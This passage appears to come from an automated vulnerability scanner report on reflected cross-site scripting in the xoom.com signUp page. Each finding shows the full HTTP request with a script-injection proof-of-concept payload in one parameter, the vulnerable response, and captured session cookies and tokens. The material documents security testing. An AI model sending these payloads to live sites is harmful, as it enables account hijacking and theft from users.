Expires=Tue, 28-Nov-2079 01:25:19 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "0bd95785b59aeacdb35e1992ff7e8d791" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:11:12 GMT Content-Length: 27626 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... <a href="?intcid=home2_____signup&d5e87"><script>alert(1)</script>e88ad41e56d =1&languageCode=de" rel="de" title="Deutsch">...[SNIP]...
1.14. https://www.xoom.com/sendmoneynow/signUp [name parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b681"><script>alert(1)</script>3233fed4aa53eacbe was submitted in the name parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=9b681"><script>alert(1)</script>3233fed4aa53eacbe &emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=B7949C1D6E76AD84B1E31B777A7C7613; Path=/sendmoneynow Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:31 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.filter.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow Set-Cookie: feeCalculatorSendAmount=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: timeZone=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: UnicaID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.cookie.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xab=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xco=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xlang=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:31 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "02e3b9a427bc17a8f9098d230e96da50e" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:11:24 GMT Content-Length: 29880 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... mp;contactInformation.email.value=&countryCode=US&first_name=&emailVerification=&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&contactInformation.firstName.value=&name=9b681"><script>alert(1)</script>3233fed4aa53eacbe &contactInformation.phone1.value=&contactInformation.lastName.value=&signInTs=1320876654393&languageCode=de" rel="de" title="Deutsch">...[SNIP]...
1.15. https://www.xoom.com/sendmoneynow/signUp [newPassword parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the newPassword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4025c"><script>alert(1)</script>547233f6bfd9112a5 was submitted in the newPassword parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=4025c"><script>alert(1)</script>547233f6bfd9112a5 &passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=14C75E1B23B9D265CE5CCBF167D890BC; Path=/sendmoneynow Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:33 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.filter.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow Set-Cookie: feeCalculatorSendAmount=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: timeZone=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: UnicaID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.cookie.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xab=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xco=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xlang=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:33 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "0b5c17fb827bf7c74928c1e290223ba0c" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:11:25 GMT Content-Length: 29980 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... <a href="?lastName=&_action=signUp&phone1Included=true&newPassword=4025c"><script>alert(1)</script>547233f6bfd9112a5 &passwordVerification=&contactInformation.email.value=&countryCode=US&first_name=&emailVerification=&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&contactInformatio...[SNIP]...
1.16. https://www.xoom.com/sendmoneynow/signUp [passwordVerification parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the passwordVerification request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 717f9"><script>alert(1)</script>e5c4c33639176b531 was submitted in the passwordVerification parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=717f9"><script>alert(1)</script>e5c4c33639176b531 &contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=7F6558C82204EEF7EF417FF7DE220148; Path=/sendmoneynow Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:33 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.filter.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow Set-Cookie: feeCalculatorSendAmount=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: timeZone=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: UnicaID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.cookie.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xab=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xco=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xlang=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:33 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "06e003cfa4921ba17655f0608570143c8" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:11:26 GMT Content-Length: 29872 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... <a href="?phone1Included=true&lastName=&_action=signUp&newPassword=&passwordVerification=717f9"><script>alert(1)</script>e5c4c33639176b531 &contactInformation.email.value=&countryCode=US&first_name=&emailVerification=&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&name=&contactInformation.firstName.valu...[SNIP]...
1.17. https://www.xoom.com/sendmoneynow/signUp [phone1Included parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the phone1Included request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3aa9d"><script>alert(1)</script>7730d018d28cd4fa6 was submitted in the phone1Included parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true3aa9d"><script>alert(1)</script>7730d018d28cd4fa6 &signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=47E143998FE155012388B29AED757AEA; Path=/sendmoneynow Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:34 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.filter.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow Set-Cookie: feeCalculatorSendAmount=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: timeZone=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: UnicaID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.cookie.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xab=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xco=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xlang=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:34 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "05807b228c58627fa212823e09ba23a84" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:11:26 GMT Content-Length: 29890 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... <a href="?phone1Included=true3aa9d"><script>alert(1)</script>7730d018d28cd4fa6 &lastName=&_action=signUp&newPassword=&passwordVerification=&contactInformation.email.value=&countryCode=US&first_name=&emailVerification=&token=2f5c1a54e134df468614...[SNIP]...
1.18. https://www.xoom.com/sendmoneynow/signUp [phone1Included parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the phone1Included request parameter is copied into the HTML document as plain text between tags. The payload c0de8<script>alert(1)</script>920b8ce3a03 was submitted in the phone1Included parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
POST /sendmoneynow/signUp HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B Content-Type: application/x-www-form-urlencoded Content-Length: 345 first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=truec0de8<script>alert(1)</script>920b8ce3a03 &signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=190FC7841C7BFADC8EF58D4328C91984; Path=/sendmoneynow Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:34 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.filter.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow Set-Cookie: feeCalculatorSendAmount=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: timeZone=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: UnicaID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.cookie.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xab=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xco=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xlang=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:34 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "0aeb911b6c63fea8978ec8320fd417fac" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:11:27 GMT Content-Length: 31037 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... trong>Failed to convert property value of type java.lang.String to required type boolean for property phone1Included; nested exception is java.lang.IllegalArgumentException: Invalid boolean value [truec0de8<script>alert(1)</script>920b8ce3a03 ]</strong>...[SNIP]...
1.19. https://www.xoom.com/sendmoneynow/signUp [signInTs parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the signInTs request parameter is copied into the HTML document as plain text between tags. The payload beb75<script>alert(1)</script>fa8efd725a was submitted in the signInTs parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
POST /sendmoneynow/signUp HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B Content-Type: application/x-www-form-urlencoded Content-Length: 345 first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393beb75<script>alert(1)</script>fa8efd725a &token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=0966F9054ECD7EC5C4922B6224DBC77F; Path=/sendmoneynow Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:35 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.filter.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow Set-Cookie: feeCalculatorSendAmount=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: timeZone=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: UnicaID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.cookie.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xab=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xco=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xlang=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:35 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "0e30ecef859e64f0dba822cf2081dcb41" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:11:28 GMT Content-Length: 31134 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... ng>Failed to convert property value of type java.lang.String to required type java.lang.Long for property signInTs; nested exception is java.lang.NumberFormatException: For input string: "1320876654393beb75<script>alert(1)</script>fa8efd725a "</strong>...[SNIP]...
1.20. https://www.xoom.com/sendmoneynow/signUp [signInTs parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the signInTs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5748"><script>alert(1)</script>8c0f4bfaa9682ceb7 was submitted in the signInTs parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393f5748"><script>alert(1)</script>8c0f4bfaa9682ceb7 &token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup Cookie: 